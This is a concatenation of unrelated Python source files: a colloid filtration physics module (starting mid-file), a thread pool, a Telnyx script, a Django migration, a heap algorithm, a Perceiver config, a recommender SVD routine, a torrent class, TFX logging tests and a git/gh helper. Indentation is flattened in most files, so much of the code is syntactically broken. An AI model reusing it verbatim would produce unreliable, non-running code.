Returns
----------
NR : float
Size ratio:
        $N_{\\rm R} = \\dfrac{d_p}{d}$
Parameters
----------
dp : float
Particle diameter [m]
dc : float
Collector diameter $d$ [m]
'''
return dp/dc
def noDim_Péclet(q,dc,Dm):
'''
Returns
----------
NPe : float
Péclet number
        .. math:: N_{\\rm Pe} = \\dfrac{qd}{D_m}
Parameters
----------
q : float
Darcy velocity [m/s]
dc : float
Collector diameter $d$ [m]
Dm : float
Molecular diffusion coefficient [m²/s]
'''
return q*dc/Dm
def noDim_vanderWaals(A,T):
'''
Returns
----------
NvdW : float
Van der Waals nondimensional number:
        .. math:: N_{\\rm vdW} = \\dfrac{A}{k_BT}
Parameters
----------
A : float
Hamaker constant between particle and collector [J]
T : float
Temperature [K]
'''
return A/(BOLTZMANN*T)
def noDim_Gravitational(dp,rho_f,rho_p,T):
'''
Returns
----------
NGr : float
Gravitational number:
        .. math:: N_{\\rm gr} = \\dfrac{4\\pi r_p^4 (\\rho_p - \\rho_f)g}{3k_BT} = \\dfrac{\\pi d_p^4 (\\rho_p - \\rho_f)g}{12k_BT}
Parameters
----------
dp : float
Particle diameter [m]
rho_f : float
Fluid mass density [kg/m³]
rho_p : float
Particle mass density [kg/m³]
T : float
Temperature [K]
'''
return (PI*(dp**4)*(rho_p-rho_f)*g)/(12.*BOLTZMANN*T)
def attachmentRate_CFT(dc,theta,alpha,U,eta0):
'''
Notes
----------
Just the definition, check attachmentRate for a complete workflow
Returns
----------
kAtt : float
        Returns the attachment rate coefficient $k_{\\rm att}$ calculated via colloid filtration theory
        .. math:: k_{\\rm att} = \\dfrac{3}{2d}(1-\\theta)\\alpha||\\vec{U}||\\eta_0
Parameters
----------
dc : float
Collector diameter (soil grain size) $d$ [m]
theta : float (0.,1.)
Porosity [-]
alpha : float (0.,1.)
Collision/attachment efficiency [-], i.e., the rate at which particles attach to the collector over the rate at which particles collide with the collector
        alpha = 1.0 for favorable attachment conditions, \\alpha < 1.0 otherwise.
U : float
Interstitial velocity [m/s]
eta0 : float
Collector efficiency $\\eta_0$ [-]
'''
return (3*(1-theta)*alpha*U*eta0)/(2*dc)
def attachmentRate(dp,dc,q,theta,visco,rho_f,rho_p,A,T,alpha=1.0,debug=False):
'''
Returns
----------
kAtt : float
Using particle/medium/fluid parameters, it returns the attachment rate coefficient calculated via colloid filtration theory.
..math:: k_{\\rm att} = \\dfrac{3}{2d}(1-\\theta)\\alpha||\\vec{U}||\\eta_0
Parameters
----------
dp : float
Particle diameter [m]
dc : float
Collector diameter $d$ [m]
q : float
Darcy velocity [m/s]
visco: float
Fluid dynamic viscosity $\\eta$ [N·s/m²]
rho_f : float
Fluid mass density [kg/m³]
rho_p : float
Particle mass density [kg/m³]
A : float
Hamaker constant between particle and collector [J]
T : float
Temperature [K]
alpha : float (0.,1.)
Collision/attachment efficiency [-]
debug : bool
Prints a list of all calculations done
'''
#Molecular diffusion
Dm = molecularDiff(visco,dp,T)
#Pore water velocity
U = poreVel(q,theta)
#Non-dimensional numbers
As = happelParameter(theta)
NR = noDim_SizeRatio(dp,dc)
NPe = noDim_Péclet(q,dc,Dm)
NvW = noDim_vanderWaals(A,T)
NGr = noDim_Gravitational(dp,rho_f,rho_p,T)
#Collector efficiency
etaD = collectorEfficiency_Diffusion(As,NR,NPe,NvW)
etaI = collectorEfficiency_Interception(As,NR,NPe,NvW)
etaG = collectorEfficiency_GDeposition(NGr,NR,NPe,NvW)
eta0 = collectorEff(etaD,etaI,etaG)
#Attachment rate
kAtt = attachmentRate_CFT(dc,theta,alpha,U,eta0)
#Print report
if(debug):
print("Diffusion coeff: {0:.4E}".format(Dm))
print("Darcy velocity: {0:.4E}".format(q))
print("Pore-water vel: {0:.4E}".format(U))
print("---")
print("Happel parameter: {0:.4E}".format(As))
print("NR number: {0:.4E}".format(NR))
print("NPe number: {0:.4E}".format(NPe))
print("NvW number: {0:.4E}".format(NvW))
print("NGr number: {0:.4E}".format(NGr))
print("---")
print("etaD collector: {0:.4E}".format(etaD))
print("etaI collector: {0:.4E}".format(etaI))
print("etaG collector: {0:.4E}".format(etaG))
print("eta0 collector: {0:.4E}".format(eta0))
print("---")
print("Attach rate : {0:.4E}".format(kAtt))
htmlOut = """
<b>Diffusion coeff:</b> {0:.4E}</br>
    <b>Darcy velocity</b> {1:.4E}</br>
    <b>Pore-water vel</b> {2:.4E}</br>
    <b>Happel parameter</b> {3:.4E}</br>
<b>NR number</b> {4:.4E}</br>
<b>NPe number</b> {5:.4E}</br>
<b>NvW number</b> {6:.4E}</br>
<b>NGr number</b> {7:.4E}</br>
</br>
<b>etaD collector</b> {8:.4E}</br>
<b>etaI collector</b> {9:.4E}</br>
<b>etaG collector</b> {10:.4E}</br>
<b>eta0 collector</b> {11:.4E}</br>
</br>
<b>Attach rate </b> {12:.4E}
""".format(Dm,q,U,As,NR,NPe,NvW,NGr,etaD,etaI,etaG,eta0,kAtt)
return kAtt,htmlOut
if __name__ == "__main__":
main()
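    # Minimal usage sketch with illustrative, assumed parameter values
    # (roughly a 1 um particle in water flowing through a sand column;
    # these numbers are examples, not taken from the module):
    kAtt, report = attachmentRate(
        dp=1e-6, dc=5e-4, q=1e-5, theta=0.35,
        visco=1e-3, rho_f=998.0, rho_p=1050.0,
        A=1e-20, T=298.0, alpha=1.0, debug=True)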
|
import collections
import threading
import os
from Queue import Queue
import vanilla
from vanilla import message
from vanilla.exception import Closed
class Pipe(object):
class Sender(object):
def __init__(self, q, w):
self.q = q
self.w = w
def send(self, item, timeout=-1):
self.q.append(item)
os.write(self.w, chr(1))
def __new__(cls, hub):
r, w = os.pipe()
q = collections.deque()
sender = Pipe.Sender(q, w)
r = hub.io.fd_in(r)
@r.pipe
def recver(r, out):
for s in r:
for ch in s:
ch = ord(ch)
if not ch:
break
out.send(q.popleft())
r.close()
out.close()
return message.Pair(sender, recver)
class Wrap(object):
def __init__(self, pool, target):
self.pool = pool
self.target = target
def __call__(self, *a, **kw):
return self.pool.call(self.target, *a, **kw)
def __getattr__(self, name):
return Wrap(self.pool, getattr(self.target, name))
class Pool(object):
def __init__(self, hub, size):
self.hub = hub
self.size = size
self.parent = hub.thread.pipe().consume(
lambda (sender, item): sender.send(item))
self.requests = Queue()
self.closed = False
self.threads = 0
for i in xrange(size):
t = threading.Thread(target=self.runner)
t.daemon = True
t.start()
self.threads += 1
def wrap(self, target):
return Wrap(self, target)
def runner(self):
while True:
item = self.requests.get()
if type(item) == Closed:
self.threads -= 1
if self.threads <= 0:
# TODO: fix up shutdown
self.parent.close()
return
sender, f, a, kw = item
self.parent.send((sender, f(*a, **kw)))
self.requests.task_done()
def call(self, f, *a, **kw):
if self.closed:
raise Closed
sender, recver = self.hub.pipe()
self.requests.put((sender, f, a, kw))
return recver
def close(self):
self.closed = True
for i in xrange(self.size):
# tell thread pool to stop when they have finished the last request
self.requests.put(Closed())
class __plugin__(object):
def __init__(self, hub):
self.hub = hub
def pipe(self):
return Pipe(self.hub)
def call(self, f, *a):
def bootstrap(sender, f, a):
sender.send(f(*a))
sender, recver = self.hub.thread.pipe()
self.t = threading.Thread(target=bootstrap, args=(sender, f, a))
self.t.start()
return recver
def pool(self, size):
return Pool(self.hub, size)
def spawn(self, f, *a):
def bootstrap(parent, f, a):
h = vanilla.Hub()
child = h.thread.pipe()
h.parent = message.Pair(parent.sender, child.recver)
h.parent.send(child.sender)
f(h, *a)
# TODO: handle shutdown
parent = self.hub.thread.pipe()
t = threading.Thread(target=bootstrap, args=(parent, f, a))
t.daemon = True
t.start()
return message.Pair(parent.recver.recv(), parent.recver)
|
import os
import telnyx
if __name__ == "__main__":
profile_name = "fill-me"
telnyx.api_key = os.environ.get("TELNYX_SECRET_KEY")
res = telnyx.VerifyProfile.create(
name=profile_name, messaging_enabled=True, default_timeout_secs=600
)
print(res)
profiles = telnyx.VerifyProfile.list()
print(profiles)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('app', '0004_lt_curso_fecha_inscripcion'),
]
operations = [
migrations.RemoveField(
model_name='certificado',
name='id',
),
migrations.AddField(
model_name='lt_curso',
name='aprobado',
field=models.NullBooleanField(default=None),
),
migrations.AlterField(
model_name='certificado',
name='id_lt_curso',
field=models.OneToOneField(primary_key=True, serialize=False, verbose_name='LT-Curso', to='app.LT_Curso'),
),
]
|
import heapq
import unittest
from typing import List
import utils
# O(nlog(n)) time. O(n) space. Greedy, binary heap.
class Solution:
def maxEvents(self, events: List[List[int]]) -> int:
events.sort(reverse=True)
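        # Sorting in descending order lets events.pop() yield the event with
        # the earliest remaining start day in O(1).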
result = 0
d = 0
q = []
while events or q:
if not q:
d = events[-1][0]
while events and events[-1][0] <= d:
heapq.heappush(q, events.pop()[1])
heapq.heappop(q)
result += 1
d += 1
while q and q[0] < d:
heapq.heappop(q)
return result
class Test(unittest.TestCase):
def test(self):
utils.test(self, __file__, Solution)
if __name__ == '__main__':
unittest.main()
|
from . import flags
from typing import Any, Dict, TypeVar, Union
LITERALS = Union[int, float, bool, str]
T = TypeVar("T", int, float, bool, str)
kvs: Dict[str, LITERALS] = dict()
def pin(name: str, value: T) -> T:
"""
Helper method for pinning random number generator seeds
"""
if flags.NAME is None:
return value
if flags.REPLAY:
assert name in kvs
assert type(value) == type(kvs[name])
return kvs[name] # type: ignore
else:
assert name not in kvs, f'{kvs}'
kvs[name] = value
return value
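# Illustrative use (assumes flags.NAME and flags.REPLAY are configured
# elsewhere; "rng_seed" is a hypothetical key):
#   seed = pin("rng_seed", 12345)   # recorded on first run, replayed later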
|
from PyQt5 import QtWidgets
class Window(QtWidgets.QWidget):
    """Builds the graphical user interface."""
    def __init__(self):
        """Initialize the graphical user interface."""
        super(Window, self).__init__()
        self.combo_box = QtWidgets.QComboBox()  # Create the combo box
        self.line_edit = QtWidgets.QLineEdit()  # Create the input field
        h_layout_1 = QtWidgets.QHBoxLayout()  # Create a horizontal layout
        for i in [self.combo_box, self.line_edit]:
            h_layout_1.addWidget(i)  # Add the widgets
        self.search_button = QtWidgets.QPushButton()  # Create the "Search" button
        self.add_button = QtWidgets.QPushButton()  # Create the "Add" button
        self.del_button = QtWidgets.QPushButton()  # Create the "Delete" button
        self.save_button = QtWidgets.QPushButton()  # Create the "Save" button
        h_layout_2 = QtWidgets.QHBoxLayout()  # Create a horizontal layout
        for i in [self.search_button, self.save_button, self.add_button, self.del_button]:
            h_layout_2.addWidget(i)  # Add the widgets
        h_layout_3 = QtWidgets.QHBoxLayout()  # Create a horizontal layout
        for i in [h_layout_1, h_layout_2]:
            h_layout_3.addLayout(i)  # Add the layouts
        self.table_widget = QtWidgets.QTableWidget()  # Create the table
        v_layout = QtWidgets.QVBoxLayout()  # Create a vertical layout
        v_layout.addLayout(h_layout_3)  # Add the layout
        v_layout.addWidget(self.table_widget)  # Add the widget
        self.setLayout(v_layout)  # Apply the vertical layout
|
# coding=utf-8
from __future__ import unicode_literals
from flask_login import current_user
from . import account_mod as mod
from pub_site import pay_client
from ..utils import login_required
from .. import response
@mod.route('/balance/', methods=['GET'])
@login_required
def balance():
user_id = current_user.user_id
result = pay_client.app_query_user_balance(user_id)
return response.success(result)
|
# coding=utf-8
# Copyright Deepmind and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Perceiver model configuration """
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
PERCEIVER_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"deepmind/language-perceiver": "https://huggingface.co/deepmind/language-perceiver/resolve/main/config.json",
# See all Perceiver models at https://huggingface.co/models?filter=perceiver
}
class PerceiverConfig(PretrainedConfig):
r"""
This is the configuration class to store the configuration of a :class:`~transformers.PerceiverModel`. It is used
    to instantiate a Perceiver model according to the specified arguments, defining the model architecture.
Instantiating a configuration with the defaults will yield a similar configuration to that of the Perceiver
`deepmind/language-perceiver <https://huggingface.co/deepmind/language-perceiver>`__ architecture.
Configuration objects inherit from :class:`~transformers.PretrainedConfig` and can be used to control the model
outputs. Read the documentation from :class:`~transformers.PretrainedConfig` for more information.
Args:
num_latents (:obj:`int`, `optional`, defaults to 256):
The number of latents.
d_latents (:obj:`int`, `optional`, defaults to 1280):
Dimension of the latent embeddings.
d_model (:obj:`int`, `optional`, defaults to 768):
Dimension of the inputs.
num_blocks (:obj:`int`, `optional`, defaults to 1):
Number of blocks in the Transformer encoder.
num_self_attends_per_block (:obj:`int`, `optional`, defaults to 26):
The number of self-attention layers per block.
num_self_attention_heads (:obj:`int`, `optional`, defaults to 8):
Number of attention heads for each self-attention layer in the Transformer encoder.
num_cross_attention_heads (:obj:`int`, `optional`, defaults to 8):
Number of attention heads for each cross-attention layer in the Transformer encoder.
qk_channels (:obj:`int`, `optional`):
Dimension to project the queries + keys before applying attention in the cross-attention and self-attention
layers of the encoder. Will default to preserving the dimension of the queries if not specified.
v_channels (:obj:`int`, `optional`):
Dimension to project the values before applying attention in the cross-attention and self-attention layers
of the encoder. Will default to preserving the dimension of the queries if not specified.
cross_attention_shape_for_attention (:obj:`str`, `optional`, defaults to :obj:`'kv'`):
Dimension to use when downsampling the queries and keys in the cross-attention layer of the encoder.
        self_attention_widening_factor (:obj:`int`, `optional`, defaults to 1):
            Dimension of the feed-forward layer in the self-attention layers of the Transformer encoder.
        cross_attention_widening_factor (:obj:`int`, `optional`, defaults to 1):
            Dimension of the feed-forward layer in the cross-attention layer of the Transformer encoder.
hidden_act (:obj:`str` or :obj:`function`, `optional`, defaults to :obj:`"gelu"`):
The non-linear activation function (function or string) in the encoder and pooler. If string,
:obj:`"gelu"`, :obj:`"relu"`, :obj:`"selu"` and :obj:`"gelu_new"` are supported.
attention_probs_dropout_prob (:obj:`float`, `optional`, defaults to 0.1):
The dropout ratio for the attention probabilities.
initializer_range (:obj:`float`, `optional`, defaults to 0.02):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
layer_norm_eps (:obj:`float`, `optional`, defaults to 1e-12):
The epsilon used by the layer normalization layers.
use_query_residual (:obj:`float`, `optional`, defaults to :obj:`True`):
Whether to add a query residual in the cross-attention layer of the encoder.
vocab_size (:obj:`int`, `optional`, defaults to 262):
Vocabulary size for the masked language modeling model.
max_position_embeddings (:obj:`int`, `optional`, defaults to 2048):
The maximum sequence length that the masked language modeling model might ever be used with. Typically set
this to something large just in case (e.g., 512 or 1024 or 2048).
image_size (:obj:`int`, `optional`, defaults to 56):
Size of the images after preprocessing, for :class:`~transformers.PerceiverForImageClassificationLearned`.
train_size (:obj:`List[int]`, `optional`, defaults to [368, 496]):
Training size of the images for the optical flow model.
num_frames (:obj:`int`, `optional`, defaults to 16):
Number of video frames used for the multimodal autoencoding model.
audio_samples_per_frame (:obj:`int`, `optional`, defaults to 1920):
Number of audio samples per frame for the multimodal autoencoding model.
samples_per_patch (:obj:`int`, `optional`, defaults to 16):
Number of audio samples per patch when preprocessing the audio for the multimodal autoencoding model.
output_shape (:obj:`List[int]`, `optional`, defaults to :obj:`[1, 16, 224, 224]`):
Shape of the output (batch_size, num_frames, height, width) for the video decoder queries of the multimodal
autoencoding model. This excludes the channel dimension.
Example::
>>> from transformers import PerceiverModel, PerceiverConfig
>>> # Initializing a Perceiver deepmind/language-perceiver style configuration
>>> configuration = PerceiverConfig()
>>> # Initializing a model from the deepmind/language-perceiver style configuration
>>> model = PerceiverModel(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
"""
model_type = "perceiver"
def __init__(
self,
num_latents=256,
d_latents=1280,
d_model=768,
num_blocks=1,
num_self_attends_per_block=26,
num_self_attention_heads=8,
num_cross_attention_heads=8,
qk_channels=None,
v_channels=None,
cross_attention_shape_for_attention="kv",
self_attention_widening_factor=1,
cross_attention_widening_factor=1,
hidden_act="gelu",
attention_probs_dropout_prob=0.1,
position_embedding_init_scale=0.02,
initializer_range=0.02,
layer_norm_eps=1e-12,
is_encoder_decoder=False,
use_query_residual=True,
vocab_size=262,
max_position_embeddings=2048,
image_size=56,
train_size=[368, 496],
num_frames=16,
audio_samples_per_frame=1920,
samples_per_patch=16,
output_shape=[1, 16, 224, 224],
**kwargs
):
super().__init__(**kwargs)
self.num_latents = num_latents
self.d_latents = d_latents
self.d_model = d_model
self.num_blocks = num_blocks
self.num_self_attends_per_block = num_self_attends_per_block
self.num_self_attention_heads = num_self_attention_heads
self.num_cross_attention_heads = num_cross_attention_heads
self.qk_channels = qk_channels
self.v_channels = v_channels
self.cross_attention_shape_for_attention = cross_attention_shape_for_attention
self.self_attention_widening_factor = self_attention_widening_factor
self.cross_attention_widening_factor = cross_attention_widening_factor
self.hidden_act = hidden_act
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.initializer_range = initializer_range
self.layer_norm_eps = layer_norm_eps
self.use_query_residual = use_query_residual
# masked language modeling attributes
self.vocab_size = vocab_size
self.max_position_embeddings = max_position_embeddings
# image classification attributes
self.image_size = image_size
# flow attributes
self.train_size = train_size
# multimodal autoencoding attributes
self.num_frames = num_frames
self.audio_samples_per_frame = audio_samples_per_frame
self.samples_per_patch = samples_per_patch
self.output_shape = output_shape
|
# Compute the volume, given the width, length and height.
# Compute the base area, given the width and the length.
width = int(input('Please enter the width: '))
length = int(input('Please enter the length: '))
area = width * length
# Compute the volume, given the base area and height.
height = int(input('Please enter the height: '))
volume = area * height
print('The volume is', volume)
|
info = {
"name": "shi-Latn",
"date_order": "DMY",
"january": [
"inn",
"innayr"
],
"february": [
"bṛa",
"bṛayṛ"
],
"march": [
"maṛ",
"maṛṣ"
],
"april": [
"ibr",
"ibrir"
],
"may": [
"may",
"mayyu"
],
"june": [
"yun",
"yunyu"
],
"july": [
"yul",
"yulyuz"
],
"august": [
"ɣuc",
"ɣuct"
],
"september": [
"cut",
"cutanbir"
],
"october": [
"ktu",
"ktubr"
],
"november": [
"nuw",
"nuwanbir"
],
"december": [
"duj",
"dujanbir"
],
"monday": [
"ayn",
"aynas"
],
"tuesday": [
"asi",
"asinas"
],
"wednesday": [
"akṛ",
"akṛas"
],
"thursday": [
"akw",
"akwas"
],
"friday": [
"asim",
"asimwas"
],
"saturday": [
"asiḍ",
"asiḍyas"
],
"sunday": [
"asa",
"asamas"
],
"am": [
"tifawt"
],
"pm": [
"tadggʷat"
],
"year": [
"asggʷas"
],
"month": [
"ayyur"
],
"week": [
"imalass"
],
"day": [
"ass"
],
"hour": [
"tasragt"
],
"minute": [
"tusdidt"
],
"second": [
"tasint"
],
"relative-type": {
"0 day ago": [
"assa"
],
"0 hour ago": [
"this hour"
],
"0 minute ago": [
"this minute"
],
"0 month ago": [
"this month"
],
"0 second ago": [
"now"
],
"0 week ago": [
"this week"
],
"0 year ago": [
"this year"
],
"1 day ago": [
"iḍlli"
],
"1 month ago": [
"last month"
],
"1 week ago": [
"last week"
],
"1 year ago": [
"last year"
],
"in 1 day": [
"askka"
],
"in 1 month": [
"next month"
],
"in 1 week": [
"next week"
],
"in 1 year": [
"next year"
]
},
"locale_specific": {},
"skip": [
" ",
".",
",",
";",
"-",
"/",
"'",
"|",
"@",
"[",
"]",
","
]
}
|
test = {
'name': 'prune_small',
'points': 0,
'suites': [
{
'cases': [
{
'code': r"""
>>> t1 = Tree(6)
>>> prune_small(t1, 2)
>>> t1
Tree(6)
>>> t2 = Tree(6, [Tree(3), Tree(4)])
>>> prune_small(t2, 1)
>>> t2
Tree(6, [Tree(3)])
>>> t3 = Tree(6, [Tree(1), Tree(3, [Tree(1), Tree(2), Tree(3)]), Tree(5, [Tree(3), Tree(4)])])
>>> prune_small(t3, 2)
>>> t3
Tree(6, [Tree(1), Tree(3, [Tree(1), Tree(2)])])
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '>>> from lab08_extra import *',
'teardown': '',
'type': 'doctest'
}
]
}
|
from .client import Spotify
__version__ = '0.0.1'
__all__ = [
    'Spotify'
]
|
from indicators.SingleValueIndicator import SingleValueIndicator
class ROC(SingleValueIndicator):
def __init__(self, period, timeSeries = None):
super(ROC, self).__init__()
self.period = period
self.initialize(timeSeries)
def _calculate(self):
if len(self.timeSeries) < self.period + 1:
return
else:
self.values.append(100.0 * (self.timeSeries[-1] - self.timeSeries[-self.period - 1]) / self.timeSeries[-self.period - 1]) |
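The rate of change computed in _calculate above is just the percentage move over `period` steps; a standalone sanity check of the same arithmetic, with made-up prices:

# Sample prices are illustrative only.
prices = [100.0, 102.0, 101.0, 105.0, 107.0, 110.0]
period = 5
roc = 100.0 * (prices[-1] - prices[-period - 1]) / prices[-period - 1]
print(roc)  # 10.0 -- the price rose 10% over the 5-step window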
import numpy as np
import scipy.sparse as sparse
from scipy.sparse import vstack
from sklearn.utils.extmath import randomized_svd
from fbpca import pca
from utils.progress import WorkSplitter, inhour
import time
def chain_item_item(matrix_train, embeded_matrix=np.empty((0)),
iteration=7, rank=200, fb=True, seed=1, chain=1, **unused):
progress = WorkSplitter()
matrix_input = matrix_train
if embeded_matrix.shape[0] > 0:
matrix_input = vstack((matrix_input, embeded_matrix.T))
progress.subsection("Randomized SVD")
start_time = time.time()
if fb:
P, sigma, Qt = pca(matrix_input,
k=rank,
n_iter=iteration,
raw=True)
else:
P, sigma, Qt = randomized_svd(matrix_input,
n_components=rank,
n_iter=iteration,
power_iteration_normalizer='QR',
random_state=seed)
RQ = matrix_input.dot(sparse.csc_matrix(Qt).T).toarray()
PS = P*sigma
SPPS = PS.T.dot(PS)
HRQ = RQ.dot(SPPS)
if chain > 1:
QTQ = Qt.dot(Qt.T)
for i in range(1, chain):
HRQ = HRQ.dot(QTQ).dot(SPPS)
print("Elapsed: {0}".format(inhour(time.time() - start_time)))
return HRQ, Qt, None
|
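A minimal smoke test for chain_item_item, assuming the module and its utils.progress dependency are importable; the toy matrix and hyperparameters below are illustrative, and fb=False sidesteps the optional fbpca path:

# Hypothetical smoke test on a tiny random implicit-feedback matrix.
toy = sparse.random(50, 40, density=0.2, format='csr', random_state=1)
HRQ, Qt, _ = chain_item_item(toy, iteration=4, rank=10, fb=False, chain=2)
print(HRQ.shape, Qt.shape)  # (50, 10) (10, 40)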
alimentos = ('hot-dog', 'hamburguer', 'batata frita')
for alimento in alimentos:
print(alimento) |
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.utils.logging_utils."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import os
# Standard Imports
import tensorflow as tf
from tensorflow.python.lib.io import file_io # pylint: disable=g-direct-tensorflow-import
from tfx.utils import logging_utils
class LoggingUtilsTest(tf.test.TestCase):
def setUp(self):
self._log_root = os.path.join(self.get_temp_dir(), 'log_dir')
self._logger_config = logging_utils.LoggerConfig(log_root=self._log_root)
def test_logging(self):
"""Ensure a logged string actually appears in the log file."""
logger = logging_utils.get_logger(self._logger_config)
logger.info('Test')
    log_file_path = self._log_root
f = file_io.FileIO(os.path.join(log_file_path, 'tfx.log'), mode='r')
self.assertRegexpMatches(
f.read(),
r'^\d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d,\d\d\d - : \(logging_utils_test.py:\d\d\) - INFO: Test$'
)
def test_default_settings(self):
"""Ensure log defaults are set correctly."""
config = logging_utils.LoggerConfig()
self.assertEqual(config.log_root, '/var/tmp/tfx/logs')
self.assertEqual(config.log_level, logging.INFO)
self.assertEqual(config.pipeline_name, '')
self.assertEqual(config.worker_name, '')
def test_override_settings(self):
"""Ensure log overrides are set correctly."""
config = logging_utils.LoggerConfig(log_root='path', log_level=logging.WARN,
pipeline_name='pipe', worker_name='wrk')
self.assertEqual(config.log_root, 'path')
self.assertEqual(config.log_level, logging.WARN)
self.assertEqual(config.pipeline_name, 'pipe')
self.assertEqual(config.worker_name, 'wrk')
if __name__ == '__main__':
tf.test.main()
|
from .utils import format_size, generate_magnet
from datetime import datetime
from .enums import Url
class Torrent(object):
"""Stores data about the torrent"""
def __init__(
self,
author=None,
category=None,
downloads=None,
host=None,
leeches=None,
registered=None,
seeds=None,
size=None,
state=None,
title=None,
topic_id=None,
hash=None,
magnet=None,
):
self.author = author
self.category = category
self.downloads = downloads
self.leeches = leeches
self.registered = registered
self.seeds = seeds
self.size = size
self.state = state
self.title = title
self.topic_id = topic_id
self.url = f"{Url.HOST.value}/forum/viewtopic.php?t={topic_id}"
self.hash = hash
self.magnet = magnet
def formatted_size(self) -> str:
"""Returns the size formated as XXX KB/MB/GB/TB"""
return format_size(self.size)
def formatted_registered(self) -> str:
"""Returns the date formatted as YYYY-MM-DD"""
return datetime.utcfromtimestamp(self.registered).strftime("%Y-%m-%d")
def get_magnet(self, hash: str = None) -> str:
"""Returns the magnet link. Requires hash"""
if self.magnet:
return self.magnet
if hash:
self.hash = hash
if not self.hash:
raise Exception("No hash provided")
self.magnet = generate_magnet(
self.hash, Url.MAGNET_ANN.value, self.title, self.url
)
return self.magnet
def __str__(self):
return f"[{self.topic_id}] {self.title}"
def __repr__(self):
return f"<Torrent {self.topic_id}>"
def as_dict(self) -> dict:
return {
"author": self.author,
"category": self.category,
"downloads": self.downloads,
"leeches": self.leeches,
"registered": self.registered,
"seeds": self.seeds,
"size": self.size,
"state": self.state,
"title": self.title,
"topic_id": self.topic_id,
"url": self.url,
"hash": self.hash,
"magnet": self.magnet,
}
def __getitem__(self, key):
return self.__getattribute__(key)
def __iter__(self):
return iter(self.as_dict().items())
|
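A brief usage sketch of the Torrent class above; every field value is fabricated for illustration:

# Hypothetical example -- all values are made up.
t = Torrent(title="Some.Show.S01", topic_id=123456, size=734003200,
            registered=1609459200, seeds=10, leeches=2)
print(t)                         # [123456] Some.Show.S01
print(t.formatted_registered())  # 2021-01-01
print(t["seeds"])                # 10, served via __getitem__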
import logging
import os
import re
import shlex
import subprocess
from collections import defaultdict
def topologically_sorted(prs):
adj = defaultdict(lambda: [])
visi = []
def dfs(cur):
# Assumes the graph is an arborescence.
for v in adj[cur]:
dfs(v)
visi.append(cur)
br_to_pr = {}
for pr in prs:
adj[pr.base].append(pr.compare)
br_to_pr[pr.compare] = pr
dfs('master')
return [br_to_pr[br] for br in visi[::-1] if br != 'master']
class CommandRunner(object):
@staticmethod
def run(cmd, interactive=False, check=True):
logging.info(f'executing command "{cmd}"')
args = shlex.split(cmd)
output = ''
if interactive:
p = subprocess.run(args, check=False)
out = None
err = None
else:
p = subprocess.run(
args, check=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out = p.stdout.decode('utf-8').strip()
if out != '':
output += f'\nstdout:\n{out}'
err = p.stderr.decode('utf-8').strip()
if err != '':
output += f'\nstderr:\n{err}'
ret = p.returncode
logging.debug(f'"{cmd}"" exited with status {ret}{output}')
if check and ret:
logging.error(f'command "{cmd}" returned non-zero exit status {ret}{output}')
exit(1)
return out, err, ret
class Git(object):
def __init__(self, runner):
self.runner = runner
self._number_to_pr = None
self._branch_to_pr = None
@staticmethod
def ensure_is_git_repo():
if not os.path.isdir('.git'):
logging.error('not a git repository')
exit(1)
def load(self, prs=None):
if not prs:
prs = self._fetch_prs()
self._number_to_pr = {pr.number: pr for pr in prs}
self._branch_to_pr = {pr.compare: pr for pr in prs}
def ensure_working_tree_is_clean(self):
out, _, _ = self.runner.run('git status')
if 'working tree clean' not in out:
logging.error('working tree is dirty')
exit(1)
def ensure_branch_is_up_to_date(self, branch):
_, err, ret = self.runner.run(f'git push origin --dry-run {branch}', check=False)
if ret or 'Everything up-to-date' not in err:
logging.error(f'{branch} is not up-to-date')
exit(1)
def ensure_prs_are_up_to_date(self):
for pr in self._number_to_pr.values():
self.ensure_branch_is_up_to_date(pr.compare)
def checkout(self, branch):
self.runner.run(f'git checkout {branch}')
def push(self, branch):
self.runner.run(f'git push origin {branch}')
def pull(self, branch, message):
self.runner.run(f'git pull origin {branch} --no-edit')
self.runner.run(f'git commit --amend -m "{message}"')
def merge(self, branch, message):
_, _, ret = self.runner.run(
f'git merge {branch} -m "{message}"', interactive=True, check=False)
return not ret
def get_last_commit_info(self):
separator = '$$'
format = f'format:%H{separator}%s{separator}%b'
out, _, _ = self.runner.run(f'git log -1 --pretty="{format}"')
return out.split(separator)
def get_current_branch(self):
out, _, _ = self.runner.run('git rev-parse --abbrev-ref HEAD')
return out
# Rebase the range of commits whose parent is 'old_base' up to 'until' on top of 'new_base'.
def rebase(self, new_base, old_base, until):
self.runner.run(f'git rebase --onto {new_base} {old_base} {until}')
def ff_master(self):
print('Fast-forwarding master')
if self.get_current_branch() == 'master':
self.runner.run('git pull origin master', interactive=True)
else:
self.runner.run('git fetch origin master:master', interactive=True)
def create_pr(self, base, title, body):
self.runner.run(f'gh pr create --base {base} --title "{title}" --body "{body}" --web',
interactive=True)
def submit_pr(self):
out, err, ret = self.runner.run(
'gh pr merge --squash --delete-branch', check=False)
# It is safe to ignore the "Reference does not exist" error.
# That happens when the remote branch had already been deleted.
if ret and 'Reference does not exist' not in err:
logging.error(err)
            return 1
print(out)
def get_sorted_prs(self):
return topologically_sorted(self._number_to_pr.values())
def get_pr_from_branch(self, branch):
pr = self._branch_to_pr.get(branch)
